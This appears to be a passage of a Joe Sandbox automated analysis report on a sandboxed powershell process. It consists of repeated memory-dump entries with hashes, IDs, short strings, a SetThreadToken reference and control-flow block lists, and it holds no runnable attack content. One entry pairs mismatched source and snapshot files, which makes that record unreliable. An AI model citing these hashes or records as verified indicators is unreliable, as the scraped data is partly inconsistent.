                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffeb7e5a5944ec5a0d9838bd115bd894f467301b66959ca63d61b91d2e28c1b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 122228B17002468FDB158F69C840B6AFBE6FF89310F1480AAE955CB351DB35ED85C7A2

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: 2bccd2cbd77eeed369c7b3d7bf29ca6e1e06562c33046f43338995bfd98ad230
• Instruction ID: 5df5fb43418ab3d8187831b5991bd99d03d26d8c12a2a923ee6f2301329f9ff7
• Opcode Fuzzy Hash: 2bccd2cbd77eeed369c7b3d7bf29ca6e1e06562c33046f43338995bfd98ad230
• Instruction Fuzzy Hash: 621245B1B442958FCB159B68D800B6BFBB2EFD2210F1480BAD955DF251DE32D885C7A2

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID: :j$:j
• API String ID: 0-4217653984
• Opcode ID: 9c2f3db2bbd7cd4d3eb37ed531fd9fa7de03d74b76d24f3611d4d373a6b9202d
• Instruction ID: ca5ffa35a2a6d714a60a4fbf0e8763e1e10ce04dea69545f9fa6115b48facebd
• Opcode Fuzzy Hash: 9c2f3db2bbd7cd4d3eb37ed531fd9fa7de03d74b76d24f3611d4d373a6b9202d
• Instruction Fuzzy Hash: 54B148B1B042599FDB148BA9D8006AAFBE2EFC6210F18C0BAD555CB351DB32DD85C7A1

Control-flow Graph

APIs
• SetThreadToken.KERNELBASE(EE340896), ref: 08EB6402
Memory Dump Source
• Source File: 0000000E.00000002.2559905641.0000000008EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_8eb0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 7194726fda64a2fc51174a7d997fb4f9be648ee535f2d38910f2f4e31675a9b3
• Instruction ID: 5dd2b8d85b595874ad6dd399af042e3d1077f88ff4eb7213d2a92f8f1b9d5da9
• Opcode Fuzzy Hash: 7194726fda64a2fc51174a7d997fb4f9be648ee535f2d38910f2f4e31675a9b3
• Instruction Fuzzy Hash: 921104B59002598FCB10DF99D944BDEFBF4AB88324F148429D459A7260C775A944CFA1

Control-flow Graph

APIs
• SetThreadToken.KERNELBASE(EE340896), ref: 08EB6402
Memory Dump Source
• Source File: 0000000E.00000002.2559905641.0000000008EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_8eb0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 149640a5eda2077c0194bfef5bdaae86b4e3db1f6604441e19bce9f1449f4070
• Instruction ID: ee46671862461b63d93f317b515af5ffa426e5c6d31b21cbf2f64e6cffa5d2e1
• Opcode Fuzzy Hash: 149640a5eda2077c0194bfef5bdaae86b4e3db1f6604441e19bce9f1449f4070
• Instruction Fuzzy Hash: 701136B19002188FCB10DF9AC944BDEFFF8EB48324F148429D458A7320C775A944CFA0

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: 6a0dacf6a9fa6304dab60d219d2acc5e18058fea4f32bd5131d4c535702295f3
• Instruction ID: b69f876a48f28c0705477e2a2fba12126ee4f1dd4162967a511b55716a7cc3e1
• Opcode Fuzzy Hash: 6a0dacf6a9fa6304dab60d219d2acc5e18058fea4f32bd5131d4c535702295f3
• Instruction Fuzzy Hash: D9413C34B002158FDB159F68C5A4AAEBBF1EF8E315F1451A9E402BB395CB35EC01CB60

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID: (&^q
• API String ID: 0-2067289071
• Opcode ID: 92e27c2eddd991760ba52bffeddc2e345100fd5798537fa0d9fd11ec11228e4e
• Instruction ID: 43983a9d0f6cb99b753469db03f973ab21d5b064153618909fd39a433c244a0f
• Opcode Fuzzy Hash: 92e27c2eddd991760ba52bffeddc2e345100fd5798537fa0d9fd11ec11228e4e
• Instruction Fuzzy Hash: EE21BC31A042688FCB14DFAED904A9EBBF5EB88324F14846ED018A7340CA75A805CFA5

Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: </9j
                                                                                                                                                                                                                                • API String ID: 0-189504548
                                                                                                                                                                                                                                • Opcode ID: 7da619cd83372a0e6279bca87e18b0cc539799db8e24cf82bcbfe3301466d595
                                                                                                                                                                                                                                • Instruction ID: 87416c8a7cab09942fff17af0adf88d7c0ba4c18a24d09e85c31b259bed7432c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7da619cd83372a0e6279bca87e18b0cc539799db8e24cf82bcbfe3301466d595
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9218B343002509FCB01DB78DA40E5ABBE5EF8A21870484AAE449DF766DB34EC05CBA1

Control-flow Graph (rendered graph; basic blocks and edges recovered from the page, executed/not-executed colouring not recoverable)
• 4e2d360-4e2d37c -> 4e2d388-4e2d3fb, 4e2d37e
• 4e2d37e -> 4e2d388-4e2d3fb
• 4e2d388-4e2d3fb -> 4e2d427-4e2d42c, 4e2d3fd-4e2d40d
• 4e2d3fd-4e2d40d -> 4e2d419-4e2d41c, 4e2d40f
• 4e2d40f -> 4e2d419-4e2d41c
• 4e2d419-4e2d41c -> 4e2d427-4e2d42c
• 4e2d427-4e2d42c (no successors)
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID: </9j
• API String ID: 0-189504548
• Opcode ID: d0650632f96534075341c481465b8440fe07ba5b1cbaab4baa78a59d0987f15f
• Instruction ID: e47bd2f0fb288bf111ec0ca06456ed2da7bcbc39cdc4449c2242d26236d9f753
• Opcode Fuzzy Hash: d0650632f96534075341c481465b8440fe07ba5b1cbaab4baa78a59d0987f15f
• Instruction Fuzzy Hash: CD2179743002149FDB04DF69DA80E5EBBE6EF8A218B00C569E40ADB765DB34FC05CBA0

Control-flow Graph (rendered graph; 40 basic blocks and their edges recovered from the page and listed in address order, executed/not-executed colouring not recoverable)
• 4e229f0-4e22a1e -> 4e22a24-4e22a3a, 4e22af5-4e22b0e
• 4e22a24-4e22a3a -> 4e22a3f-4e22a52, 4e22a3c
• 4e22a3c -> 4e22a3f-4e22a52
• 4e22a3f-4e22a52 -> 4e22af5-4e22b0e, 4e22a58-4e22a65
• 4e22a58-4e22a65 -> 4e22a67, 4e22a6a-4e22a7c
• 4e22a67 -> 4e22a6a-4e22a7c
• 4e22a6a-4e22a7c -> 4e22af5-4e22b0e, 4e22a7e-4e22a88
• 4e22a7e-4e22a88 -> 4e22a96-4e22aa6, 4e22a8a-4e22a8c
• 4e22a8a-4e22a8c -> 4e22a96-4e22aa6
• 4e22a96-4e22aa6 -> 4e22af5-4e22b0e, 4e22aa8-4e22ab2
• 4e22aa8-4e22ab2 -> 4e22ab4-4e22ab6, 4e22ac0-4e22af4
• 4e22ab4-4e22ab6 -> 4e22ac0-4e22af4
• 4e22ac0-4e22af4 (no successors)
• 4e22af5-4e22b0e -> 4e22b10-4e22b16, 4e22b17-4e22b27
• 4e22b10-4e22b16 -> 4e22b17-4e22b27
• 4e22b17-4e22b27 -> 4e22ab4-4e22ab6, 4e22b28-4e22b2c
• 4e22b28-4e22b2c -> 4e22b42-4e22b56, 4e22b2e-4e22b37
• 4e22b2e-4e22b37 -> 4e22c51-4e22c61, 4e22b3d-4e22b41
• 4e22b3d-4e22b41 -> 4e22b42-4e22b56
• 4e22b42-4e22b56 -> 4e22b5b-4e22b69, 4e22b58
• 4e22b58 -> 4e22b5b-4e22b69
• 4e22b5b-4e22b69 -> 4e22c51-4e22c61, 4e22b6f-4e22b79
• 4e22b6f-4e22b79 -> 4e22b87-4e22b94, 4e22b7b-4e22b7d
• 4e22b7b-4e22b7d -> 4e22b87-4e22b94
• 4e22b87-4e22b94 -> 4e22c51-4e22c61, 4e22b9a-4e22baa
• 4e22b9a-4e22baa -> 4e22baf-4e22bbd, 4e22bac
• 4e22bac -> 4e22baf-4e22bbd
• 4e22baf-4e22bbd -> 4e22c51-4e22c61, 4e22bc3-4e22bd3
• 4e22bc3-4e22bd3 -> 4e22bd5, 4e22bd8-4e22be5
• 4e22bd5 -> 4e22bd8-4e22be5
• 4e22bd8-4e22be5 -> 4e22c51-4e22c61, 4e22be7-4e22bf7
• 4e22be7-4e22bf7 -> 4e22bf9, 4e22bfc-4e22c08
• 4e22bf9 -> 4e22bfc-4e22c08
• 4e22bfc-4e22c08 -> 4e22c51-4e22c61, 4e22c0a-4e22c24
• 4e22c0a-4e22c24 -> 4e22c26, 4e22c29
• 4e22c26 -> 4e22c29
• 4e22c29 -> 4e22c2e-4e22c38
• 4e22c2e-4e22c38 -> 4e22c3d-4e22c50
• 4e22c3d-4e22c50 (no successors)
• 4e22c51-4e22c61 (no successors)
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f0897fa07006f2a6102ea6495cc7a412471a3bea4e9e4fe5cb5a3a3c47cea1b
• Instruction ID: 25264fb5d2086c822577fb762dcd6dbbe9d8c3a01b07007f7f78dbc7d8503998
• Opcode Fuzzy Hash: 9f0897fa07006f2a6102ea6495cc7a412471a3bea4e9e4fe5cb5a3a3c47cea1b
• Instruction Fuzzy Hash: 1391BBB0A002199FCB15CF58C5C49AEFBB1FF88310B248699D955AB3A5C736FC52CB90
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3802382024b00dae73befd015c9ab031def95482836f55485ee76288bcd5cbd5
• Instruction ID: 252db78c2f9226cbf07f58e76d12d5b3f1c484e39f6a2af9fdba6224e901bff8
• Opcode Fuzzy Hash: 3802382024b00dae73befd015c9ab031def95482836f55485ee76288bcd5cbd5
• Instruction Fuzzy Hash: 5F611971E002588FCB14DFA9D6846DDBBF5EF88314F14816AE819AB364EB34AC45CB60
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbbecae137a982dfd4d42fa1aac5ae1d1000ec3c57ed4b79a722316f16fdaf81
• Instruction ID: bc45c7c75004157b21d4cc19985be84a87eb2f324caab4de4558052ea0af191c
• Opcode Fuzzy Hash: fbbecae137a982dfd4d42fa1aac5ae1d1000ec3c57ed4b79a722316f16fdaf81
• Instruction Fuzzy Hash: F151D0343002259FD708DB69D944A6AB7E6FFC8258B1594A9E509CB352EB35EC01CBA0
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc1ba62508b71a39276bb781dad9de36de389d02b202f92942aac3c6c6261247
• Instruction ID: d77a8a471fc9634fc8ae8fcea08ccbe2c38b26bcfaf74f3118d0d9fcdf6e0781
• Opcode Fuzzy Hash: cc1ba62508b71a39276bb781dad9de36de389d02b202f92942aac3c6c6261247
• Instruction Fuzzy Hash: 74513971E00258CFCB15DFA9D684ADDBBF5FF88314F148069E819AB365EB34A845CB60
Memory Dump Source
• Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b7581862594ced8dc9f1f92173d6147f9a91873886a08de31df45a31b3c80c5
• Instruction ID: 4249e5b904d26cf516f3e3283258b92a4e48e83a7ba8e08b19c3f2510a83089a
• Opcode Fuzzy Hash: 3b7581862594ced8dc9f1f92173d6147f9a91873886a08de31df45a31b3c80c5
• Instruction Fuzzy Hash: CF4114F0A452429FDF24CF6CC802A6AFBF2EF81250F1580A6D900AF255DB32D885C7E5
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73e7dd944655e0712b1b23e43f50b365a16e2ed5542f8f538a7d35c1dbbf2473
• Instruction ID: d6f88298c6b444c06edbbf0e4298b372879834325208441c6597bbb0bce48d70
• Opcode Fuzzy Hash: 73e7dd944655e0712b1b23e43f50b365a16e2ed5542f8f538a7d35c1dbbf2473
• Instruction Fuzzy Hash: B34158B4A006198FCB09CF58C6989AEFBB1FF48314B118699D915AB364C736FC51CFA0
Memory Dump Source
• Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 269651c8fa00bb98ee8ddd57260f55f0ba1dcab739eed014f083189828762090
• Instruction ID: 65a8a0776138f8763b8f823dbaf7489fc4022870a98c7aec4db8d88238e9e494
• Opcode Fuzzy Hash: 269651c8fa00bb98ee8ddd57260f55f0ba1dcab739eed014f083189828762090
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9316035A042158FDB15CF64C694AAABBF2EF8D315F1950A9D442BB351DB34EC41CF60
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1a0551072222716a2c5068cc622cb44230b316436a0650331c3d5d8acd55d89c
                                                                                                                                                                                                                                • Instruction ID: 5775a04ebdc0a495d09f8a6c7e2a990ad419d2c0807eb592c2f56ddb679337a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a0551072222716a2c5068cc622cb44230b316436a0650331c3d5d8acd55d89c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A3189313006119FD705EB78E954A9EB7A2EFC4215F008639EA0ACB3A5DF71E945CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 51af8bea72a38fb8601b3e20c8db4466adbae697f04766dc4b2ab0650f43cf0a
                                                                                                                                                                                                                                • Instruction ID: f0b5ebe927abb31e29b1560211cbe030db21bf92a8528c6af7139359b659803e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51af8bea72a38fb8601b3e20c8db4466adbae697f04766dc4b2ab0650f43cf0a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB319F70A002199FDB45EFB9D594BAEBBF6EF88314F149029E405EB350EB349C418F61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f114b506b1062babac6a6987569e96de188089b5fbafdccbeac3aa82211e86b5
                                                                                                                                                                                                                                • Instruction ID: 9e80b7ac5f80c2141237c69191a1e9924cc7953b07dc80f60cba536be6c28b99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f114b506b1062babac6a6987569e96de188089b5fbafdccbeac3aa82211e86b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D316F70A002199FDB45EFB9D594BAEBBF6EF88314F149029E405EB350EB34AC418F64
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 834d464f87bb863abb1cb196691436912fc83d656c6874ae7a797c9adcda52d3
                                                                                                                                                                                                                                • Instruction ID: e764cf536480a57cda2709bcb219e5facf9523be3b549ac80c7067014b732542
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 834d464f87bb863abb1cb196691436912fc83d656c6874ae7a797c9adcda52d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C315E74B002148FCB04DF68D5A8AAEBBF1EF88715F044529D406EB391DF34AD41CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 83abc7c2a17cf7132099ee42223ea8d0ffd159f83ce8896e2fb2e995c9f43331
                                                                                                                                                                                                                                • Instruction ID: d26cedfbd561538a4dc24eb343aa766e6f10509b458c6cc2b4ebd842b11b75c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83abc7c2a17cf7132099ee42223ea8d0ffd159f83ce8896e2fb2e995c9f43331
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E3172B4B001059FEB04EFB4D554AAE77B2EF84304F1184B9D515AB395DA78AD02CF60
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a67e4dbe878f43d21fb03c09e027f96963df4272b476148c825359654c029e89
                                                                                                                                                                                                                                • Instruction ID: b63ae514a8060f273be659ee05d18e5c73bd935bfe0dd7ea83b57c6bcea0730c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a67e4dbe878f43d21fb03c09e027f96963df4272b476148c825359654c029e89
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91312974B002148FCB14DF68D5A8AAEBBF6EF88715F145529D806E7390DF74AC41CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4aa2a033af615c811fe85e9d3179bc28925ac3d984342f04b9431ae71100bdb9
                                                                                                                                                                                                                                • Instruction ID: 2061d93296b48c795eadda84e3f86d75937764e907c75ec16fdd7339b074a477
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa2a033af615c811fe85e9d3179bc28925ac3d984342f04b9431ae71100bdb9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A3164B4F001099FEB04EFB4D555ABEB7B2EF84308F118479D515AB394DA79AD028FA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad2739eca878ad349893903e8e32457161233f79846df5757a3f92f8588a97f4
                                                                                                                                                                                                                                • Instruction ID: c5dd178291449237e136aaa1ec2a2766aaddb4d1013330d2f70c8dd0dcfadb6c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad2739eca878ad349893903e8e32457161233f79846df5757a3f92f8588a97f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2421F171604200EFCF05DF14DAC4B26BF75FB98318F24CAADE9094A256C376E456EB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction ID: add8fa49bb21e0e2e1cf2fd95e0e9a214a74227553709ff9395702c5de07b24c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F211DD75504280CFDB06CF10CAC4B16BFB1FB84318F28CAAED8494B656C33AE44ADB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a0e1693dd26687ce85d684c0f7b5ce8eea76ed93eb8b922d4bdbd19e06ea0fae
                                                                                                                                                                                                                                • Instruction ID: 037cb7126f7da212cfc95f336d8192802ea28267635c394bf38604f6ad48690c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0e1693dd26687ce85d684c0f7b5ce8eea76ed93eb8b922d4bdbd19e06ea0fae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C01B1316047149FD728CF7AD984B9ABBE1EF49254F2488ADD49EC76A1DB30F842CB00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dea12f7ae00b107bc1cea5e5315400f2fb30fd98e028bea10d02bda40395e21e
                                                                                                                                                                                                                                • Instruction ID: 9be1a163fe255bbad254959f94876c100b3732c36fb4cbf4d1365e0a2f6f147f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dea12f7ae00b107bc1cea5e5315400f2fb30fd98e028bea10d02bda40395e21e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC019235B042149FCB11AFB4E808AAEBBF5FB88315F00406DE50AD3242DB316901CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d74daf873df2a0d43080c437a3e646826ff315fbbe218bac38d711b1cb03f151
                                                                                                                                                                                                                                • Instruction ID: 40c84ecbc838a0116701b1fc070d9eece08c3d25573435a2aa366b8a27ea061e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d74daf873df2a0d43080c437a3e646826ff315fbbe218bac38d711b1cb03f151
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5110534204750CFC768DF75D49085ABBF6EF8921972489ADD48A8BBA0DB32F846CB50
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2536982637.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4d2d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 84d9f0ef920bba212b21e84d722335d0a8e8928670adbe4afe2c5d8143390042
                                                                                                                                                                                                                                • Instruction ID: 7162227e48217498face527baca45fb215f004594c7a854a03c48b535e15218b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d9f0ef920bba212b21e84d722335d0a8e8928670adbe4afe2c5d8143390042
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D012B312083149AE7104E25DF84767BFD8EF51328F18C429ED484B156C279E841C6B1
                                                                                                                                                                                                                                Memory Dump Source
